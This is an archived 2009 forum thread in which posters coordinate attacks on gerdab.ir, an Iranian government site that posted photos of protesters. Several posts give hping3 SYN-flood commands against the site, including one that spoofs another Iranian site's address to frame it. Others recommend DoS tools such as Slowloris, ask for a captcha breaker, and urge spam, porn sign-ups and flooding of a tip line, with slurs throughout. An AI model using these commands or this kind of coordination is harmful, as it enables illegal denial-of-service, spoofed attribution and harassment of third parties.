Site showing pictures of protesters!

Discussion in 'Help Iran Online' started by Unregistered, Jun 24, 2009.

  1. Srpska Member

    Sadly, that's my diagnosis too.

    The addition of new pictures suggests protests are still happening in some form, though, which is encouraging; I guess we need to start getting the message out there (if it isn't already) that the protesters really need to take steps to disguise their faces.

    inb4 V mask
  2. Speaking of going old school: I ran a few brief tests with hping3 in ubuntu. Such as this one:

    hping3 w w w . g e r d a b . i r -p 80 -i u30000 -S (remove spaces in host name, obviously)

    A brief test resulted in a steady ~4 kb/s out, ~2 kb/s back, 2% packet loss.

    This is a conventional SYN flood, with all that that entails.

    Also tried:

    hping3 --flood -a -e "Flood" -S -s 80 w w w . g e r d a b . i r (useless. ~100% packet loss)
    hping3 w w w . g e r d a b. i r -p 80 -i u30000 --udp (useless. ~100% packet loss)

    Can anyone with more hping3 experience refine the attack string? Or is this just a certain and useless ticket to IP ban land anyway?
  3. stills shows an uptime counter of 100 % .... It was added yesterday. They now seem very confident in resisting our attacks.
  4. Our Community

    I work for a man from Iran (parents still live there...) his nephew came to the US a few years ago. Our restaurant has been used as a base for Persian Americans going to and from the protest...I know a lot of people have had requests for native Farsi speakers, I was going to try and get the nephew in on this.

    Also, a former server from our restaurant now does something involving computer security or something...idk but he rocks computers. I'm going to try and get him in on this, I think he might need a challenge.

    Everyone communicating through twitter and facebook needs to put it out there that protesters MUST cover their faces!!!!!!! They can't let any more pix be taken to be put on gerdab....If we get the message out, maybe it won't be as necessary to take down the websites... We need to do what we can, but at the same time keeping safe in Iran is essential!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Sunglasses, scarves, bandannas....change it up, keep strong but keep safe!!!!!!!!!!!!!!!!
  5. Ray Murphy Member

    It's obviously not true (outside of Iran at least) because my repeated attempts to read the site from Australia have all failed during the last week. I have only ever seen the whirlpool image on about one third of visits but nothing else.
  6. Vee Member

    Australia here too. Currently firefox is giving a net:error to the site
  7. Srpska Member

    Incidentally, I would expect that at some point in the future the Gerdabfags will probably try to attack this forum, whether by internet means or directly by trolling/flooding/threatening. Be on your guard.

    That's by way of being a side note to my main thought here, though, which is this:

    I am not convinced we'll take this site down with Nedasites alone. Playing nice does not win wars.

    Now, that may sound like some kind of macho e-fapping (HEY GUISE LOOK HOW BIG MY E-PEN0R IS, I CAN TALK LIKE A FUCKING MARINE ON THE INTERNETS), but I'm not saying it to big myself up - I'm already pretty awesome, thanks - I'm saying it because I think it's true. The issue is who of us are (a) expert enough and (b) willing to put on a darker shade of hat in order to get the job done. Personally, I am certainly (b) but I fear I am not really (a). This is because I realise that knowing a bit of JavaScript doesn't make you fucking Neo.

    There is also (c) to be considered, which is the T&C's of this forum. Are we allowed to promote/facilitate things that are illegal where we are hosted (presumably the US)? Probably not.

    I haven't been in IRC for a while, mainly because it's full of faggots, but maybe some discussion of more, shall we say, "radical" steps could take place there.

  8. Ray Murphy Member

    Where else can we meet if that happens?
    Any ideas anyone?
  9. I tried the hping3 thing there for a few hours. It seemed to have a bit of traction there for a while but now my packets are just bouncing off.

    Good news is somebody seems to be having more success than I am. The Aussie is right. Downforeveryoneorjustme has no problem reaching gerdab but it seems awfully sluggish to me. Kudos to those of you still in the fight.

    I think my own time will be better spent cleaning out and hardening my system in preparation to Haystack it.
  10. Srpska Member

    I'd guess IRC, but there's no need to panic yet!
  11. Another data point:

    http:// m a s h r o o h . c o m /index.php?option=com_content&task=view&id=107706&Itemid=1506

    Only one image shows up. These images become unavailable when gerdab goes down. So whatever you folks are doing, please keep it up. OK, I'm done obsessing now. Really :)
  12. brat Member

    a few pieces of good news - figured they were needed by now :)

    1) shahabnews dot com is d o w n .. woot.

    2) while putting together the other list of sites thread, I found gerdab has a sister site (?) mirror site? - not sure what to call it. it's on the same IP BUT it's hosted by a company in California, called DreamHost - they also have a contact form on their site - Web Hosting by DreamHost Web Hosting: Web Sites, Domain Registration, WordPress, Ruby on Rails, all on Debian Linux!

    3) 1/2 good news. one of the report links (the "contact") one on gerdab is broken. the "report" one is working... but the report link appears to just be to report "immoral" websites and destructive political sites.... hmmm.... :blink blink:

    but on a sad note: grrrbad .. is working fine for me. sigh. :(
  13. hping use a different ip address

    if you want to avoid being ip blocked - use a different ip address with the -a flag.

    hping3 -i u1 -S -p 80 -a

    you could use the address of another site in iran - say the real loser of the election - and that's where the attack will appear to be coming from.

    only thing is, you won't get any packets back (because the ACK's are going to that loser's site) - so your only sense of effectiveness will be whether the site slows down . . .
  14. Mirror site for Gerdab?

    It is up for me too - What is the name and IP address of the mirrored site?
  15. Hping3?

    Can you give more info on the use of HPING to attack the IRI sites please. I understand it is a packet generator tool. Would the parameters you outlined "hping3 -i u1 -S -p 80" would do what?
  16. Gerdab is talking about us!

    Look at this link (Farsi) in Gerdab. It is talking about being hacked by hackers in US and Canada paid by the protesters... حملات هکری تروریست های مجازی به سایت گرداب
    Oh, and they want all indecent or malicious sites to be reported to them!

    Lets send them links pointing to lots of hardcore animal porn sites! :) That would keep these sick little perverted bastards busy, playing with themselves for a while...

    Paid government employees are no match to a bunch of angry, determined volunteers...
  17. Stacy Member

    So they think mentioning the FBI is going to scare the Americans? Do they think we are stupid enough to think the FBI is going to arrest us for trying to take down pictures of protesters so they won't be marked for death????
  18. Stacy Member

    Oh and do anyone catch the irony, they called US terrorists. HA!
  19. Well I'm proud of the work we are all doing. I just wonder if the 100000000 emails I have been spamming with has had any effect? hmmmmmmmmmm.
  20. Stacy Member

    Obviously there has been enough of a problem for them to post someonething about it. :)
  21. does the comment page work for you?

    every time i try to connect to the comment page, i get an error 500.

    i spammed the hell out of a few days ago, but now i can't reach it directly or through tor. is it really broken?
  22. ask not what it can do for you, ask what it will do to them!!

    it will make them suck the juice of freedom - preferably while they think they are sucking their own crotch missile (which is all they really want to do anyways).

    try it, you'll like it. it can no doubt be improved. but you'll feel like you've emptied your bladder on the iranian cyber security team - and that feels good.

    hping3 -i u1 -S -p 80 -a

    don't forget to download and install hping first . . .
  23. wondered the same

    I've wondered that as well, but there seems to be a few of us out there as this morning when I was signing for a couple of free singles accounts (under the account name I got a few websites that wouldn't let me do it because apparently that e-mail is already registered for quite a few I resent the password. Hehehe.

    I just wish there was a way to tell if the spamming is just wasting our theory drowning them in info sounds good, but if they have a good junk mail filter set up, I wonder how much is actually getting through...It's not like they're stupid!
  24. gerdab scum comment page

    lol here in the us I got the same error message...I haven't really done much to spam them, so I don't think they have blocked my IP.

    "Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.

    Please contact the server administrator, and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log."

    Funnily enough, I am MORE than willing to contact the administrator.....I hope he likes gay porn...


  25. yoohanson Member

    They enabled contact page with chaptcha field
  26. Vee Member

    Sign them up the the online pharmacies
  27. gerdab is practically begging to have their call center flooded beyond all repair. Go ahead.

    In connection with this system can you with the telephone number is 4 33219370 contacted the Go ahead.
  28. Tried this number, and got a message saying the number did not exist. I put the 98 prefix on. So, questions are, am I doing something wrong, if this number is no longer current is there a current number, and can anyone confirm the veracity of this number being the gerdab tip-line.

    Also, a suggested tweet for people to do: " and I hear they like to be signed-up for gay porn. #iranelection #iran #gr88 #tehran #neda"

    Even if they have a response form up (I am IP banned and can't see the site atm) it should still be going to an email address. If someone could try to confirm what email address the form is pointed at, that might be helpful).
  29. brat Member

  30. brat Member

    I get the same error :D
  31. it was up on te /contact page bout five hours ago. Now there are only email sub scripts there. Hey what's woody doing there. شبکه دارکوب

  32. Srpska Member

    I see another uptime counter has been added. NEEDS MOAR DESTROY DIE ATTACK
  33. SanguineRose Member

    This I Proclaim Epic Fail....

    Unless that IP is on the same general network it will be filtered out. Spoofing generally only works on Private Networks/LANs. Trying it from a home connection has a .0001% chance of actually working.
  34. Aside from gay porn

    Some other groups that will send lots of spam....apparently and seem to be interested in joining the US military...and going to a US college.

  35. Yeah don't forget ahmedinejad loves him some gay porn.

    I heard they might be interested in a free iPhone too.
  36. keeping them busy

    at least we're keeping a few of them busy. now the forms have a captcha field - can't spam them anymore :(

    and they bothered to ip ban me. :p

    aside from signing up their email addresses on mailing lists . . .

    what's next? what's the best way to harass them now?
  37. 2 /r/'s

    (a) Does anyone have a good captcha killer? (one that can be used with a readily available macro or automation prog). I've not bothered with the mass mailing/reporting through the forms, etc. but as it's clearly having an effect and Gerdab's still up, it makes perfect sense.

    (b) Some new DOS kit. There seems to be increasing evidence that Slowloris, Pyloris et al are no longer having the same effect (beyond the fact that the site's not down), and I can't help wondering whether Nedasites has - in some way - been flagged, as at least two of us can no longer get through even when connecting from multiple IPs. I'm hoping the Nedasites guys will be able to resolve this, but in the meantime...we need some weapons.

    I've gone through the Partyvan frontpage, and they do have a few tools that haven't seen much use so far. Which would be the best choice? [DOS 5.5 is riddled with AIDS, but HPingand Zap Attack seem fine.] Any suggestions?
  38. refresh the crap out of their web servers

    This may be old news, but this site Sagg-e Zard: Open Following Web Links to Help Crash Web Sites of Islamic Regime has a nice link to a webbased utility called that refreshes some IRI sites every second. It seems to work with rajanews and presstv but I am getting an error with - check it out and give them some hell...
  39. sucker is still alive

    It is working for me - maybe they banned your IP -
  40. nudist dorothy

    Soroush Resaneh Institute is the name of the distributer company for the tv. (the public gov-sponsored only tv)

Share This Page

Customize Theme Colors


Choose a color via Color picker or click the predefined style names!

Primary Color :

Secondary Color :
Predefined Skins